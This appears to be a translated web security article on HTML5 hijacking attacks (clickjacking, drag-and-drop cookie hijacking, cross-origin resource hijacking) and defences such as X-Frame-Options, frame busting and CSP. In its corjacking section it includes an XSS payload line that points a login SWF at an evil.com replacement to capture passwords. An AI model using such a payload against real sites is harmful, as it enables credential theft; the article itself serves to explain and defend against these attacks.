HTML5 Security Risk Analysis: Hijacking attack

Source: Internet
Author: User

This article looks at one class of HTML5 security problem: hijacking attacks.

First, clickjacking: click hijacking

This type of attack is becoming more and more common. The attacked page is loaded in an IFRAME whose layer is set to transparent and stacked on top of the attacker's page, so the malicious content is hidden behind what the user sees. The page appears harmless, and the user is lured into clicking on its content, which lets the attacker steal user information or hijack the user's actions. For example, the decoy page is placed on the lower layer and the attacked bank page on the transparent layer above it: the user sees the decoy, types and clicks on it, but the real input and clicks land on the bank page.

Imagine what click hijacking can do: trick you into posting a bogus microblog, sending a fake email, or even giving away personal information. For instance, it can entice you into posting a bogus Twitter message.

The test tool clickjacktest can detect whether your page is at risk of click hijacking: enter a URL and click Test. If the page renders and loads inside the test frame, it can be framed and is therefore exposed to click hijacking; if the frame stays blank, the page is refusing to be framed and is better protected. Note that this only checks the browser you run the test in, so a page that stays blank here may still be frameable in other browsers.

Second, cookiejacking: cookie hijacking

Clickjacking involves only clicks, but the HTML5 drag-and-drop API allows the attack to be extended to drag-and-drop operations, and many web applications ask the user to drag and drop things. Under the same-origin policy, a domain's cookie can only be accessed by that domain, but data the user drags is delivered to whatever page it is dropped on, regardless of origin. This lets an attacker combine drag-and-drop with XSS and other techniques to construct apparently legitimate cross-domain requests and hijack cookies.

Drag and drop cookies from one domain to another

The principle is the same as clickjacking: as long as the user can be tricked into performing the drag-and-drop, information from one domain can be sent to another. This is easy to arrange. One researcher built a Facebook app that let users drag and drop pictures of attractive women, and most people would try it without becoming suspicious.

A little game that tricks the user into dragging and dropping

How should we prevent clickjacking and cookiejacking?

1. X-Frame-Options: all modern browsers support the X-Frame-Options HTTP header, which tells the browser whether the page may be rendered inside an IFRAME (DENY forbids framing entirely; SAMEORIGIN allows framing only by pages from the same origin). When X-Frame-Options is in effect, the framed page is simply not rendered.

2. JavaScript frame busting

This is a very common approach; the code is as follows:

    // Frame busting: if this window is not the top-level window, it is being
    // framed, so navigate the top-level window to this page to escape the frame.
    if (top !== window)
        top.location = window.location.href;

Both Facebook and Twitter have used this approach, but it is not entirely effective: an attacker can bypass it, for example with the IFRAME sandbox attribute, with an HTTP 204 redirect trick, or by disabling JavaScript. A stronger variant hides the document body by default and reveals it only after confirming that top === self, and the Content-Security-Policy frame-ancestors directive gives the same guarantee as X-Frame-Options with finer control over which origins may frame the page.

However, at least 80% of sites are still unaware of click hijacking and cookie hijacking and are unprotected. The main purpose of this article is to draw attention to this covert attack pattern and to targeted defences.

Third, corjacking: cross-domain resource hijacking

Corjacking refers to cross-origin resource hijacking. HTML5 applications use a variety of resources, such as Flash files, Silverlight, video and audio, which can be accessed and controlled through the DOM. If an XSS vulnerability exists on the page, an attacker can exploit it to hijack a cross-domain resource. For example, the following code loads a SWF file as the user's login box, and the SWF may implement some cryptographic logic.

  <object classid="clsid:xxxxxxx-xxxx-xxxx-xxxxxx" id="Login" width="100%" height="100%"
          codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
    <param name="movie" value="login.swf" />
    <param name="quality" value="high" />
    <!-- the embed carries name="Login" so that the script below can address it by name -->
    <embed src="login.swf" name="Login" quality="high" width="50%" height="50%">
  </object>

When an XSS vulnerability exists on the page, an attacker can use the following script to replace the SWF file with a fraudulent one:

    // Point the embed named "Login" at the attacker's SWF; the page keeps rendering a login box
    document.getElementsByName('Login').item(0).src = 'http://evil.com/login.swf';

When the user then enters a username and password into this login box and logs in, the account is stolen.

Browsers behave inconsistently here, and interested readers can test it for themselves. Whatever the browser, a Content-Security-Policy object-src directive restricted to the origin hosting the legitimate SWF stops the replacement resource from loading even if the XSS succeeds, and fixing the XSS removes the attack entirely.
